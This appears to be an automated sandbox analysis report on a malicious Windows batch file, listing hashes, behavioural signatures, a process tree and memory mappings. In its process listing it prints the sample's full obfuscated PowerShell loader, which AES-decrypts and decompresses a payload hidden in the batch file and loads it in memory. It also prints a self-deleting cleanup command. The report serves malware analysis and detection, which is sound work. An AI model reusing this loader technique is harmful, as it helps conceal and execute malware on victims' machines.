Analysis
-
max time kernel
90s -
max time network
115s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system -
submitted
25-01-2023 10:37
Static task
static1
Behavioral task
behavioral1
Sample
xxicqf.bat
Resource
win10v2004-20220901-en
General
-
Target
xxicqf.bat
-
Size
325KB
-
MD5
4f3c7ff71a35d8abaf90dd0f2353b621
-
SHA1
b42e3e4ea9ff13c978d1b614f06f2d86735e495d
-
SHA256
76fc358fa8b3b845ac771bd4dd0746bb49f537ebcf61737e9ee4e5582fdd133a
-
SHA512
a81106eea5988266fe759d22393b3b5f745c4e27db367ba930913c29c5afe03cac374112c1ec312c2f267d8477eab1e8f2bdf709c28b0a3ef0f90f762cdc982f
-
SSDEEP
6144:sb0ERTjCC/oq28xqqHBykjjIxEfTKyRfFysWiS3IzZK/DPcAW:sbXjCC/oX8x3HBykjMxsmyRf1UaKTcAW
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
Processes:
xxicqf.bat.exepid process 628 xxicqf.bat.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
xxicqf.bat.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation xxicqf.bat.exe -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 17 api.ipify.org 18 api.ipify.org -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
wermgr.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz wermgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString wermgr.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 wermgr.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
Processes:
wermgr.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS wermgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU wermgr.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
xxicqf.bat.exepid process 628 xxicqf.bat.exe 628 xxicqf.bat.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
xxicqf.bat.exedescription pid process Token: SeDebugPrivilege 628 xxicqf.bat.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
xxicqf.bat.exepid process 628 xxicqf.bat.exe -
Suspicious use of WriteProcessMemory 16 IoCs
Processes:
cmd.exexxicqf.bat.execmd.execmd.exedescription pid process target process PID 4324 wrote to memory of 628 4324 cmd.exe xxicqf.bat.exe PID 4324 wrote to memory of 628 4324 cmd.exe xxicqf.bat.exe PID 628 wrote to memory of 4340 628 xxicqf.bat.exe cmd.exe PID 628 wrote to memory of 4340 628 xxicqf.bat.exe cmd.exe PID 628 wrote to memory of 212 628 xxicqf.bat.exe cmd.exe PID 628 wrote to memory of 212 628 xxicqf.bat.exe cmd.exe PID 628 wrote to memory of 484 628 xxicqf.bat.exe wermgr.exe PID 628 wrote to memory of 484 628 xxicqf.bat.exe wermgr.exe PID 4340 wrote to memory of 4588 4340 cmd.exe chcp.com PID 4340 wrote to memory of 4588 4340 cmd.exe chcp.com PID 212 wrote to memory of 4468 212 cmd.exe choice.exe PID 212 wrote to memory of 4468 212 cmd.exe choice.exe PID 4340 wrote to memory of 3704 4340 cmd.exe PING.EXE PID 4340 wrote to memory of 3704 4340 cmd.exe PING.EXE PID 212 wrote to memory of 2344 212 cmd.exe attrib.exe PID 212 wrote to memory of 2344 212 cmd.exe attrib.exe -
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\xxicqf.bat"
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\xxicqf.bat.exe"xxicqf.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $TaxYb = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\xxicqf.bat').Split([Environment]::NewLine);foreach ($SdoSn in $TaxYb) { if ($SdoSn.StartsWith(':: ')) { $NuzKW = $SdoSn.Substring(3); break; }; };$OHzNm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($NuzKW);$BecaB = New-Object System.Security.Cryptography.AesManaged;$BecaB.Mode = [System.Security.Cryptography.CipherMode]::CBC;$BecaB.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$BecaB.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0LL9z94yl5wYGOKSb2hreL71eR6/82H+3uxqNqN5hfA=');$BecaB.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('R3CRmi+qFKdZMzOHEfmfcA==');$EBkLd = $BecaB.CreateDecryptor();$OHzNm = $EBkLd.TransformFinalBlock($OHzNm, 0, $OHzNm.Length);$EBkLd.Dispose();$BecaB.Dispose();$bbcNa = New-Object System.IO.MemoryStream(, $OHzNm);$HkQNi = New-Object System.IO.MemoryStream;$phbxT = New-Object System.IO.Compression.GZipStream($bbcNa, [IO.Compression.CompressionMode]::Decompress);$phbxT.CopyTo($HkQNi);$phbxT.Dispose();$bbcNa.Dispose();$HkQNi.Dispose();$OHzNm = $HkQNi.ToArray();$ZnJXZ = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($OHzNm);$YEeli = $ZnJXZ.EntryPoint;$YEeli.Invoke($null, (, [string[]] ('')))
- Executes dropped EXE
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\24hThCDJcd5N.bat" "
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\chcp.comchcp 65001
-
C:\Windows\system32\PING.EXEping -n 10 localhost
- Runs ping.exe
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c choice /c y /n /d y /t 1 & attrib -h -s "C:\Users\Admin\AppData\Local\Temp\xxicqf.bat.exe" & del "C:\Users\Admin\AppData\Local\Temp\xxicqf.bat.exe"
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\choice.exechoice /c y /n /d y /t 1
-
C:\Windows\system32\attrib.exeattrib -h -s "C:\Users\Admin\AppData\Local\Temp\xxicqf.bat.exe"
- Views/modifies file attributes
-
C:\Windows\system32\wermgr.exe"C:\Windows\system32\wermgr.exe" "-outproc" "0" "628" "3628" "3532" "2904" "0" "0" "2144" "0" "0" "0" "0" "0"
- Checks processor information in registry
- Enumerates system info in registry
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\24hThCDJcd5N.batFilesize
211B
MD539f88ba1ed3e90cab71806a54bd40c7a
SHA175726c444f4630a5a3a046955e41d2bee4f3751f
SHA256db29147a00ef147848ea12573b88d772cdfdcee0758c1a14f87d105da7b983aa
SHA51231141a2827f1a9572f6dc9e64be1b11587b5fad732c778018e37a15526a9911ae8f20e7f0b494d62cd200fcbed8784ea1e4249e371b5c094dab88b084334efca
-
C:\Users\Admin\AppData\Local\Temp\xxicqf.bat.exeFilesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
C:\Users\Admin\AppData\Local\Temp\xxicqf.bat.exeFilesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
memory/212-142-0x0000000000000000-mapping.dmp
-
memory/484-143-0x0000000000000000-mapping.dmp
-
memory/628-132-0x0000000000000000-mapping.dmp
-
memory/628-138-0x000002D8AE780000-0x000002D8AE832000-memory.dmpFilesize
712KB
-
memory/628-139-0x000002D8AEDA0000-0x000002D8AEF62000-memory.dmpFilesize
1MB
-
memory/628-140-0x00007FFC48150000-0x00007FFC48C11000-memory.dmpFilesize
10MB
-
memory/628-137-0x000002D8AE670000-0x000002D8AE6C0000-memory.dmpFilesize
320KB
-
memory/628-134-0x000002D8AE1B0000-0x000002D8AE1D2000-memory.dmpFilesize
136KB
-
memory/628-135-0x00007FFC48150000-0x00007FFC48C11000-memory.dmpFilesize
10MB
-
memory/628-148-0x00007FFC48150000-0x00007FFC48C11000-memory.dmpFilesize
10MB
-
memory/2344-149-0x0000000000000000-mapping.dmp
-
memory/3704-147-0x0000000000000000-mapping.dmp
-
memory/4340-141-0x0000000000000000-mapping.dmp
-
memory/4468-146-0x0000000000000000-mapping.dmp
-
memory/4588-145-0x0000000000000000-mapping.dmp